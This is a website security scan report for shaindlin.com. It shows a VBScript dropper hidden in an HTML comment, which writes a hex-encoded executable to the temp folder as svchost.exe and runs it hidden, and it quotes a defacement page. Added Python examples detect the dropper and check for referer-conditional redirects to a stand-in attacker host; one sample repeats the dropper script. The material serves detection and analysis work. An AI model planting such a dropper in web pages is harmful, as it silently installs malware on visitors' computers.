Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=shaindlin.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer. Details are available on the diagnostic page queried above.
Scanned pages/files
Request | Server response | Status |
http://shaindlin.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 13 Oct 2015 18:33:50 GMT Location: http://www.shaindlin.com/ Server: Apache Vary: Accept-Encoding Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shaindlin.com/ | 200 OK Content-Length: 117148 Content-Type: text/html | suspicious |
Detection details for http://www.shaindlin.com/:
(1) Malicious code - confirmed by antiviruses (see antivirus reports below). The page carries VBScript inside an HTML comment that decodes a hex blob (it begins 4D5A, the "MZ" magic of a Windows executable) into the user's temporary folder as svchost.exe and launches it with a hidden window. The blob is cut off in the report (no closing quote), so only its start is shown:
<!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000    ' truncated in the report
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName    ' GetSpecialFolder(2) = TemporaryFolder
If FSO.FileExists(DropPath)=False Then
  Set FileObj = FSO.CreateTextFile(DropPath, True)
  For i = 1 To Len(WriteData) Step 2
    FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))    ' two hex digits -> one byte
  Next
  FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0    ' 0 = run with the window hidden
//-->
Antivirus reports:
(2) Deface/Content modification. The following signature was found: [#] HacKeD By Killer~X [#]. The Internet Explorer "saved from url" comment shows the defacement page was saved from http://cz-aquaproducts.com/ and reused here; its script reference ./111_files/gsrs and the other 111_files resources requested in the rows below all returned 404.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<!-- saved from url=(0027)http://cz-aquaproducts.com/ -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta http-equiv="Content-Language" content="en-us">
<title>[#] HacKeD By Killer~X [#]</title>
<!--<base href="https://twitter.com/ClaXHacK">--><base href=".">
<meta name="description" content="hacked by Killer~X :~ twitter: ClaxHacK">
<meta name="keywords" content="hacked by Killer~X - Killer~X - Killer~X - ">
<script type="text/javascript" src="./111_files/gsrs"></script><style type="text/css"></st ...[117381 bytes skipped]...
http://www.shaindlin.com/./111_files/gsrs | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.shaindlin.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://shaindlin.com/./111_files/clickbinder.do | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 13 Oct 2015 18:33:53 GMT Location: http://www.shaindlin.com/111_files/clickbinder.do Server: Apache Vary: Accept-Encoding Content-Length: 257 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shaindlin.com/111_files/clickbinder.do | 404 Not Found Content-Length: 341 Content-Type: text/html | clean |
http://shaindlin.com/./111_files/getSnoozing.do | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 13 Oct 2015 18:33:54 GMT Location: http://www.shaindlin.com/111_files/getSnoozing.do Server: Apache Vary: Accept-Encoding Content-Length: 257 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shaindlin.com/111_files/getsnoozing.do | 404 Not Found Content-Length: 341 Content-Type: text/html | clean |
http://shaindlin.com/./111_files/getJsonAds | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 13 Oct 2015 18:33:55 GMT Location: http://www.shaindlin.com/111_files/getJsonAds Server: Apache Vary: Accept-Encoding Content-Length: 253 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shaindlin.com/111_files/getjsonads | 404 Not Found Content-Length: 337 Content-Type: text/html | clean |
http://shaindlin.com/./111_files/nocoverage.do | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 13 Oct 2015 18:33:55 GMT Location: http://www.shaindlin.com/111_files/nocoverage.do Server: Apache Vary: Accept-Encoding Content-Length: 256 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shaindlin.com/111_files/nocoverage.do | 404 Not Found Content-Length: 340 Content-Type: text/html | clean |
http://shaindlin.com/./111_files/getJsonAds(1) | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 13 Oct 2015 18:33:56 GMT Location: http://www.shaindlin.com/111_files/getJsonAds(1) Server: Apache Vary: Accept-Encoding Content-Length: 256 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shaindlin.com/111_files/getjsonads(1) | 404 Not Found Content-Length: 340 Content-Type: text/html | clean |
https://static.publikeco00.publikeco.com/apps/boot/boot-start.js?cb=8 | 200 OK Content-Length: 1534 Content-Type: application/javascript | clean |
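Added example, not part of the scanner output or of the site's own code: a small Python detector for the two findings reported above, the hex-to-file VBScript dropper hidden in an HTML comment and the "HacKeD By" defacement title. It decodes the WriteData blob the same way the dropper's Chr/Mid loop does and checks for the MZ magic. The sample page, its short hex blob and all function names are constructed for this example; they are modelled on the report, not copied from the live site.

```python
import re
from typing import Dict, List

# Markers of the "hex blob -> %TEMP%\<name> -> WScript.Shell.Run" dropper seen in the report.
DROPPER_MARKERS = (
    'CreateObject("Scripting.FileSystemObject")',
    'CreateObject("WScript.Shell")',
    ".Run ",
)
COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)
# The closing quote is optional: the report's copy of the blob is cut off before it.
WRITEDATA_RE = re.compile(r'WriteData\s*=\s*"([0-9A-Fa-f]*)"?', re.IGNORECASE)
DROPNAME_RE = re.compile(r'DropFileName\s*=\s*"([^"]+)"', re.IGNORECASE)
TITLE_RE = re.compile(r"<title[^>]*>(.*?)</title>", re.IGNORECASE | re.DOTALL)
DEFACE_RE = re.compile(r"hacked\s+by", re.IGNORECASE)


def decode_hex_blob(hexdata: str) -> bytes:
    """Mirror the dropper's loop: Chr(CLng("&H" & Mid(WriteData,i,2))) = one byte per hex pair."""
    clean = re.sub(r"[^0-9A-Fa-f]", "", hexdata)
    if len(clean) % 2:          # a truncated blob may end on a lone digit; drop it
        clean = clean[:-1]
    return bytes.fromhex(clean)


def scan_html(html: str) -> List[Dict[str, str]]:
    """Return one finding per dropper comment and one for a defacement title."""
    findings: List[Dict[str, str]] = []
    for m in COMMENT_RE.finditer(html):
        body = m.group(1)
        if not all(marker in body for marker in DROPPER_MARKERS):
            continue
        wd = WRITEDATA_RE.search(body)
        blob = decode_hex_blob(wd.group(1)) if wd else b""
        name = DROPNAME_RE.search(body)
        findings.append({
            "type": "vbscript-dropper",
            "drop_file": name.group(1) if name else "?",
            "payload_magic": blob[:2].decode("latin-1") if len(blob) >= 2 else "",
            "payload_is_pe": "yes" if blob.startswith(b"MZ") else "no",
        })
    t = TITLE_RE.search(html)
    if t and DEFACE_RE.search(t.group(1)):
        findings.append({"type": "defacement", "signature": t.group(1).strip()})
    return findings


# Constructed sample page modelled on the report's findings (hex blob shortened).
SAMPLE_INFECTED = r'''<!DOCTYPE html>
<html><head><title>[#] HacKeD By Killer~X [#]</title></head><body>
<!-- saved from url=(0027)http://cz-aquaproducts.com/ -->
<!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B800"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//-->
</body></html>'''

SAMPLE_CLEAN = "<html><head><title>Shaindlin</title></head><body><!-- nav --><p>hi</p></body></html>"

if __name__ == "__main__":
    for f in scan_html(SAMPLE_INFECTED):
        print(f)
    print("clean page:", scan_html(SAMPLE_CLEAN))
```

Requiring all three markers keeps ordinary commented-out VBScript from firing; the MZ check tells you whether the blob is a native executable rather than, say, a script, which decides what the dropped file should be analysed as.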
Malicious Redirects
Two requests are compared: a direct visit and the same request carrying a search-engine Referer header, because injected redirects are often conditional and fire only for visitors arriving from a search engine, so that the site owner never sees them.
First query (normal visit):
GET / HTTP/1.1
Host: shaindlin.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 13 Oct 2015 18:33:50 GMT
Location: http://www.shaindlin.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
...233 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: shaindlin.com
Referer: http://www.google.com/search?q=shaindlin.com
Result:
The result is similar to the first query's: no suspicious redirects were found.
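Added example, not part of the scanner output: a Python comparator that performs the check described in this section offline. It parses two raw HTTP responses (direct visit and search-engine-referred visit), collects every redirect target from each (Location header, meta refresh, window/document/top.location assignments) and flags the pair when the status codes or targets diverge or when the referred response redirects off-site. The direct response is rebuilt from the headers shown above; the cloaked response, the host attacker.example and the function names are constructed for this example.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import urlparse

REDIRECT_CODES = {301, 302, 303, 307, 308}
# Client-side redirect idioms a conditional-redirect injection typically uses.
CLIENT_REDIRECT_RE = re.compile(
    r'(?:http-equiv\s*=\s*"?refresh"?[^>]*url\s*=\s*'
    r'|(?:window|document|top)\.location(?:\.href)?\s*=\s*["\'])'
    r'(https?://[^"\'\s>]+)',
    re.IGNORECASE,
)


def parse_response(raw: str) -> Tuple[int, Dict[str, str], str]:
    """Split a raw HTTP response into (status code, lower-cased headers, body)."""
    sep = "\r\n\r\n" if "\r\n\r\n" in raw else "\n\n"
    head, _, body = raw.partition(sep)
    lines = head.splitlines()
    status = int(lines[0].split()[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        k, _, v = line.partition(":")
        headers[k.strip().lower()] = v.strip()
    return status, headers, body


def redirect_targets(status: int, headers: Dict[str, str], body: str) -> List[str]:
    """All places this response sends the browser: server-side Location plus client-side idioms."""
    targets: List[str] = []
    if status in REDIRECT_CODES and "location" in headers:
        targets.append(headers["location"])
    targets.extend(CLIENT_REDIRECT_RE.findall(body))
    return targets


def norm_host(url: str) -> str:
    """Hostname without a leading www., so shaindlin.com and www.shaindlin.com compare equal."""
    return re.sub(r"^www\.", "", (urlparse(url).hostname or "").lower())


def compare(host: str, direct_raw: str, referred_raw: str) -> Dict[str, object]:
    d_status, d_hdrs, d_body = parse_response(direct_raw)
    r_status, r_hdrs, r_body = parse_response(referred_raw)
    d_targets = redirect_targets(d_status, d_hdrs, d_body)
    r_targets = redirect_targets(r_status, r_hdrs, r_body)
    site = norm_host("http://" + host)
    offsite = [t for t in r_targets if norm_host(t) != site]
    suspicious = d_status != r_status or d_targets != r_targets or bool(offsite)
    return {
        "direct_status": d_status,
        "referred_status": r_status,
        "direct_targets": d_targets,
        "referred_targets": r_targets,
        "offsite_targets": offsite,
        "body_differs": d_body != r_body,   # reported, not by itself treated as suspicious
        "suspicious": suspicious,
    }


# Constructed from the 301 shown in the report (body text is a placeholder).
DIRECT = (
    "HTTP/1.1 301 Moved Permanently\r\nConnection: close\r\n"
    "Date: Tue, 13 Oct 2015 18:33:50 GMT\r\nLocation: http://www.shaindlin.com/\r\n"
    "Server: Apache\r\nVary: Accept-Encoding\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n"
    "<html><body>Moved Permanently</body></html>"
)
# Constructed cloaked answer: what a referer-conditional injection would return instead.
REFERRED_CLOAKED = (
    "HTTP/1.1 302 Found\r\nLocation: http://attacker.example/land.php\r\n"
    "Content-Type: text/html\r\n\r\n"
    "<html><script>window.location='http://attacker.example/land.php'</script></html>"
)

if __name__ == "__main__":
    print("same answer  :", compare("shaindlin.com", DIRECT, DIRECT)["suspicious"])
    print("cloaked pair :", compare("shaindlin.com", DIRECT, REFERRED_CLOAKED))
```

The Referer header is only one trigger; real injections also key on the User-Agent (search-engine crawler versus browser), cookies and client IP, so a clean result here, as in the report above, means no referer-conditional redirect was observed, not that the site serves one page to everyone.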